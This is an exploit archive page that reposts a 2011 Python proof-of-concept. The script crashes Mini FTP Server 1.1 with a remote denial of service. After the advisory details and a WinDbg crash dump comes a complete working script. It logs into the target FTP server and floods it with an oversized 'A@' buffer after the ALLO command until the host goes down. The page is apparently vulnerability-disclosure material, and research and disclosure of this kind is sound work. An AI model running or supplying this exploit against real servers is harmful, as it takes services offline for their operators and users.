the original cloud security

Mini FTP Server 1.1 Denial Of Service

Mini FTP Server 1.1 Denial Of Service
Posted Aug 28, 2011
Authored by LiquidWorm | Site zeroscience.mk

Mini FTP Server version 1.1 buffer corruption remote denial of service exploit.

tags | exploit, remote, denial of service
MD5 | ae5338d23b34f5ad338332bbc123fd00

Mini FTP Server 1.1 Denial Of Service

Change Mirror Download
#!/usr/bin/python
#
#
# Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit
#
#
# Vendor: webmaster442
# Product web page: http://miniftpserver.codeplex.com
# Affected version: 1.1.1.0
#
# Summary: Minimal FTP server for windows. Uses only managed code. Works
# with Total commander.
#
# Desc: MiniFTPServer suffers from a denial of service vulnerability
# when passing large number of bytes after authentication, resulting
# in a crash. No need for a valid FTP command to exploit this issue.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# -----------------------------------------------------------------
#
# (1540.918): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384
# eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 031187d3 3909 cmp dword ptr [ecx],ecx ds:0023:00000000=????????
# 0:011> d edx
# 00f163e8 80 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00 .j.z(.......d...
# 00f163f8 54 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80 Tr..............
# 00f16408 00 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00 ....Ld..........
# 00f16418 18 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
# 00f16428 b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
# 00f16438 00 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00 ............P...
# 00f16448 00 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00 ....h..y....pd..
# 00f16458 00 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00 .............r..
# 0:011> d
# 00f16468 00 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00 ..........\{....
# 00f16478 80 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79 .....d......`..y
# 00f16488 c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79 ...............y
# 00f16498 f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
# 00f164a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 00f164b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 00f164c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 00f164d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#
# -----------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2011-5040
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php
#
#
# 28.08.2011
#

import socket, sys

if len(sys.argv) < 2:
print ("\n===============================================")
print ("\nMini FTP Server 1.1 Remote DoS Exploit\n")
print ("Zero Science Lab - http://www.zeroscience.mk")
print ("\nID: ZSL-2011-5040")
print ("\n===============================================")
print ("\n - Usage: "+ sys.argv[0] +" [hostname]\n")
sys.exit(0)

host = (sys.argv[1])
data = ("A@" * 50000) #Any char and combination would do
cmd = ('ALLO') #Any CMD would do, or no CMD at all

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("\r\n[+] Attacking: " + host +"\r\n")
print ("[*] Please be patient...\r\n")

try:
s.connect((host, 21))
r=s.recv(1024)
print (r)
s.send("USER username\r\n")
r=s.recv(1024)
print (r)
s.send("PASS password\r\n")
r=s.recv(1024)
print (r)
s.send(cmd + " " + data + '\r\n')
r=s.recv(1024)
print (r)
print ("[*] Please be patient...\r\n")
for x in range(0,10): s.send(cmd + " " + data + '\r\n')
r=s.recv(1024)
print (r)
s.close()

try: s.connect((host,21))
except: print ("\r\n[*] Host is down!")

except: print ("[*] Oops!")

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    6 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close